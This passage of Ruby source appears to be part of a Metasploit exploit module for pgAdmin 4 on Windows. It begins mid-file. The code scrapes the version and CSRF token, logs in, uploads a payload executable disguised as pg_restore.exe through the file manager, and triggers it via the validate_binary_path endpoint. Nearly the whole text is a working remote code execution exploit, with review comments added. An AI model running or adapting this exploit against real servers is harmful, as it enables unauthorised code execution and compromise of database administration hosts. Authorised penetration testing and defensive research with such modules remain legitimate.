    platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first
    return platform == 'win32'
  end
end

# Derives the pgAdmin version from the "?ver=" query string on a <link> tag.
#
# Requests the login page when a login is enforced, otherwise browser/, and
# bails out (returns nil) unless the page <title> is exactly 'pgAdmin 4' and
# some <link href> carries a ?ver= value. The three capture groups of the
# regex in the find block are read back through Regexp.last_match after the
# block returns, which only works because find stops at the first match.
#
# Returns a Rex::Version, or nil when the page cannot be recognised.
def get_version
  if auth_required?
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
  else
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true)
  end
  html_document = res&.get_html_document
  return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4'

  # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,
  # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27
  versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }
  return unless versioned_link

  # The leading \d? lets the major part be one or two digits; to_i drops any
  # leading zero from the minor and patch parts.
  Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")
end

# Returns the CSRF token pgAdmin expects on state-changing requests, fetching
# and memoising it in @csrf_token on first use.
#
# With a login enforced the token is scraped from the login page by
# set_csrf_token_from_login_page; otherwise from browser/js/utils.js by
# set_csrf_token_from_config (both defined elsewhere in this module). Calls
# fail_with(Failure::UnexpectedReply) when neither path sets @csrf_token.
def csrf_token
  return @csrf_token if @csrf_token

  if auth_required?
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
    set_csrf_token_from_login_page(res)
  else
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)
    set_csrf_token_from_config(res)
  end
  fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token
  @csrf_token
end

# Module entry point.
#
# 1. Refuses to run when a login is enforced but USERNAME/PASSWORD are unset.
# 2. When a login is enforced, POSTs the credentials plus CSRF token to
#    authenticate/login and treats any 302 that does not point back at the
#    login page as success (the session cookie is kept by keep_cookies).
# 3. Requires on_windows? to be truthy, then hands a payload executable named
#    pg_restore.exe to file_manager_upload_and_trigger.
#
# Connection failures anywhere in the method are mapped to
# Failure::Unreachable by the method-level rescue.
#
# NOTE(review): auth_required? is evaluated twice here (plus once more inside
# csrf_token), each time issuing its own request; caching the answer would
# remove the repeated round trips.
def exploit
  if auth_required? && !(datastore['USERNAME'].present? && datastore['PASSWORD'].present?)
    fail_with(Failure::BadConfig, 'The application requires authentication, please provide valid credentials')
  end

  if auth_required?
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'authenticate/login'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_post' => {
        'csrf_token' => csrf_token,
        'email' => datastore['USERNAME'],
        'password' => datastore['PASSWORD'],
        'language' => 'en',
        'internal_button' => 'Login'
      }
    })

    # pgAdmin redirects back to the login page on a failed attempt, so a 302
    # elsewhere is taken as an authenticated session.
    unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login')
      fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin')
    end

    print_status('Successfully authenticated to pgAdmin')
  end

  unless on_windows?
    fail_with(Failure::BadConfig, 'This exploit is specific to Windows targets!')
  end
  # The fixed name matters: file_manager_upload_and_trigger slices the
  # returned path by a constant that assumes this exact file name length.
  file_name = 'pg_restore.exe'
  file_manager_upload_and_trigger(file_name, generate_payload_exe)
rescue ::Rex::ConnectionError
  fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end

# file manager code is copied from pgadmin_session_deserialization module

# Opens a file manager "storage dialog" transaction via a JSON POST to
# file_manager/init, authenticated with the CSRF token header.
#
# Returns [trans_id, home_folder] read from data.transId and
# data.options.homedir of the JSON reply; calls
# fail_with(Failure::UnexpectedReply) when the status is not 200 or either
# value is missing/falsy. The two values are assigned inside the guard
# condition, which is why they are in scope for the return below.
def file_manager_init
  res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'file_manager/init'),
    'method' => 'POST',
    'keep_cookies' => true,
    'ctype' => 'application/json',
    'headers' => { 'X-pgA-CSRFToken' => csrf_token },
    'data' => {
      'dialog_type' => 'storage_dialog',
      'supported_types' => ['sql', 'csv', 'json', '*'],
      'dialog_title' => 'Storage Manager'
    }.to_json
  })

  unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir'))
    fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder')
  end

  return trans_id, home_folder
end

# Uploads file_contents under file_path into the file manager's home folder,
# registers the dropped file for cleanup, then submits its directory to
# misc/validate_binary_path.
#
# @param file_path [String] file name sent in the multipart filename field
# @param file_contents [String] raw bytes of the file (a payload executable
#   when called from exploit)
# @return [true] once the final request has been sent; its response is not
#   inspected
#
# Calls fail_with(Failure::UnexpectedReply) when the upload does not answer
# HTTP 200 with "success": 1.
def file_manager_upload_and_trigger(file_path, file_contents)
  trans_id, home_folder = file_manager_init

  form = Rex::MIME::Message.new
  form.add_part(
    file_contents,
    'application/octet-stream',
    'binary',
    "form-data; name=\"newfile\"; filename=\"#{file_path}\""
  )
  form.add_part('add', nil, nil, 'form-data; name="mode"')
  form.add_part(home_folder, nil, nil, 'form-data; name="currentpath"')
  form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"')

  res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"),
    'method' => 'POST',
    'keep_cookies' => true,
    'ctype' => "multipart/form-data; boundary=#{form.bound}",
    'headers' => { 'X-pgA-CSRFToken' => csrf_token },
    'data' => form.to_s
  })
  unless res&.code == 200 && res.get_json_document['success'] == 1
    fail_with(Failure::UnexpectedReply, 'Failed to upload file contents')
  end

  # data.result.Name is the server-side path of the stored file; it is what
  # gets removed again at cleanup time.
  upload_path = res.get_json_document.dig('data', 'result', 'Name')
  register_file_for_cleanup(upload_path)
  print_status("Payload uploaded to: #{upload_path}")

  # The slice keeps all but the last 15 characters of upload_path, i.e. it
  # assumes the path ends in a one-character separator followed by the
  # 14-character 'pg_restore.exe' name chosen in exploit.
  # NOTE(review): this silently breaks for any other file_path; deriving the
  # cut from file_path.length (or using File.dirname) would keep the two in
  # step.
  send_request_cgi({
    'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'),
    'method' => 'POST',
    'keep_cookies' => true,
    'ctype' => 'application/json',
    'headers' => { 'X-pgA-CSRFToken' => csrf_token },
    'data' => {
      'utility_path' => upload_path[0..upload_path.size - 16]
    }.to_json
  })

  true
end

end